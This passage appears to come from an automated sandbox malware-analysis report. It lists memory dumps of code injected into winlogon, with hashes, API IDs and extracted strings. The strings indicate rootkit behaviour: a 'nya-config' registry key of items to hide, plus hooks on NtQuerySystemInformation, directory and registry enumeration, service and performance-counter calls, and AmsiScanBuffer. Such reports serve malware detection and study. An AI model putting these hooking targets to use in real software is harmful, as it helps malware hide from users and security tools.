                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: 5adcafa524db9b9dda6abc00bbd20b9cf03d535e82a6ec1ffaa50773eb971994
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: 3341913A214F90A6EB60CF68E8483AE73A4F788755F504625EB9D47B98EF38C555CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: ba0da918b920b46cc3a54e3475de2942f0cc50fd05a53ecf8fda4ebbffebb54b
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: 8941933A214F90A6EB60CF69E8443DE73A4F788755F604215EB8D87B98EF38C155CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: d4c58a7ce2da72e66ff3ace40df1018a246c983fc32be65cdbeef41b8fe5e660
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: FAA13C26B1CEA069FB20DBFDE44C3AD7BA5E741B96F14C155DE8A27B99CA34C041C700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: 066ae2d50c83c03fb0a7661ee4d1289901ef4a01654f13085524b5d77c354e57
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: D2A13A26704EA069FB20DBFDE4483AD6BA0E781B96F14CD15DE9927ED9DE38C049C700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: 72535559d70cf38c0e92f1948c1c347a54dc7448aa5b502777709f8b5d1bd708
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: 3FA15D26704FA079FB20DBFDD4883AD6BA1E741B96F64C115DE99A7BA9CA38C441C700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction ID: 0548d9b6fff432b0518ac17f6716f417ff667374554f4e73728657456859a9e6
                                                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction Fuzzy Hash: 06115B2A725F149AEB00CFA4E8583A933A4F719759F440E21EA6D87BA4EF78D154C340
                                                          APIs
                                                            • Part of subcall function 00000225DC64D220: HeapAlloc.KERNEL32(?,?,00000000,00000225DC64C987), ref: 00000225DC64D275
                                                            • Part of subcall function 00000225DC650EB8: _invalid_parameter_noinfo.LIBCMT ref: 00000225DC650EEB
                                                          • FindFirstFileExW.KERNEL32 ref: 00000225DC64DB99
                                                            • Part of subcall function 00000225DC64D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000225DC64674A), ref: 00000225DC64D2B6
                                                            • Part of subcall function 00000225DC64D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000225DC64674A), ref: 00000225DC64D2C0
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 2436724071-0
                                                          • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction ID: 5649dc98808358dfbd84c4d7499f086ba2f24cef526f849533dea570b867d2bc
                                                          • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction Fuzzy Hash: FD81072A71CEA0A5EB20DFA9E4483AEB791E385BD1F14C165EF9A47BD5DE38C041C700
                                                          APIs
                                                            • Part of subcall function 00000225DC67D220: HeapAlloc.KERNEL32(?,?,00000000,00000225DC67C987), ref: 00000225DC67D275
                                                            • Part of subcall function 00000225DC680EB8: _invalid_parameter_noinfo.LIBCMT ref: 00000225DC680EEB
                                                          • FindFirstFileExW.KERNEL32 ref: 00000225DC67DB99
                                                            • Part of subcall function 00000225DC67D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000225DC67674A), ref: 00000225DC67D2B6
                                                            • Part of subcall function 00000225DC67D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000225DC67674A), ref: 00000225DC67D2C0
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                           • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 2436724071-0
                                                          • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction ID: 2c038651c2ae92960c88feeb5b316e6b4e497a468d42326572a94128b7c2197c
                                                          • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction Fuzzy Hash: E481E63A304EA0A5EB20DBA9E54836EA791F784BD5F04CE15AEAD17FD5DE38C046C700
                                                          APIs
                                                            • Part of subcall function 00000225DC6AD220: HeapAlloc.KERNEL32(?,?,00000000,00000225DC6AC987), ref: 00000225DC6AD275
                                                            • Part of subcall function 00000225DC6B0EB8: _invalid_parameter_noinfo.LIBCMT ref: 00000225DC6B0EEB
                                                          • FindFirstFileExW.KERNEL32 ref: 00000225DC6ADB99
                                                            • Part of subcall function 00000225DC6AD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000225DC6A674A), ref: 00000225DC6AD2B6
                                                            • Part of subcall function 00000225DC6AD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000225DC6A674A), ref: 00000225DC6AD2C0
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                           • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 2436724071-0
                                                          • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction ID: 29c8525217016a3ed37e239d8c2e36f40a7bfde11074850fae087498558bbfe9
                                                          • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                          • Instruction Fuzzy Hash: 5681F82A304FA065EB24DFAAE44839EA791E785BD5F24C115EF99877D5DE38C142C700
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                          • Instruction ID: d37147464f2ba52ae4694af389c00b8e5a18bc58587e02b0b8f105e6f8330097
                                                          • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                          • Instruction Fuzzy Hash: B4119BB56189E196F7AA8F6DD45931977D0E3193D7F84C02DD4498BA94CB3DC4A0DF00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                           • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: 71e44e630dde731c405f647dad9c2186ef0b895953d0d266fcbe89d85e1081a3
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: 9D71003A710E60A5EB10DFA9E85879D23B4FB84B8AF409513DD4E57BA9EF34C445C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                           • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: 50516736a4d467b6a673d53e6823db0b8cd195352840e3040242fee159b92cf1
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: 9D71603A310E64E5EB10DFAAE85869D33B5FB94B8AF449112DE4E83B68EF34C444C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                           • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: e6ecbfd54cacd5b4c593c1ac77e66936a6f024f3d5a9e4cde235fe008a8dc896
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: 66516C6C514E6AF5FB01EFECEC5D7D42360AB44747F90C91398092A9A5EE7CC25AC382
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                           • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: ab248220f55d8a8bf603ad1d8e7c18a74e840ae1d8f43e8d78061fc47a12bc73
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: 94519AAC194E6AB5EB01EFECED5C7D42762BB50747F90C523A40992661EF3CC25AC390
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                           • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: e4fbe600ac6e3f6c3fd389522d33e79d55d6745fab416e8290641ec0d2ad3330
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: 16516F36214F94AAE764CFA6E84C35AB7A1F788F9AF548124DE4A07758EF3CC049C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                           • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: 37fd39670bbdcc54ea09762e972c4b0ccfec49a203bbfccbc513fbeee86dfb37
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: EF516236210F94A6E724CFA6E44835A77A1FB88F99F448525DE8A07B98EF3CC055C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                           • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: e6ef2d74a113b6a2436a0bf4e662f067906ac5c54f8ed1bf6393795d3f8873bc
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: 7F516236214F94EAE764CFAAE44839A77A2F798F9AF548124DE4A47758EF3CC045C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                           • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: 3bbe528764dd29461f2b489f7bb424fdd3c8e1eb83be9ed074256bc9518d600c
                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: AF519139701F2471FE149BAAA8187A52290BB48BB2F588B25AE3947BD0EF38D445C751
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                           • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: 0e80d652f4081b1e4fca29c38c4c1cd2ef8707dab7f660b0183de6f6bb59e2ad
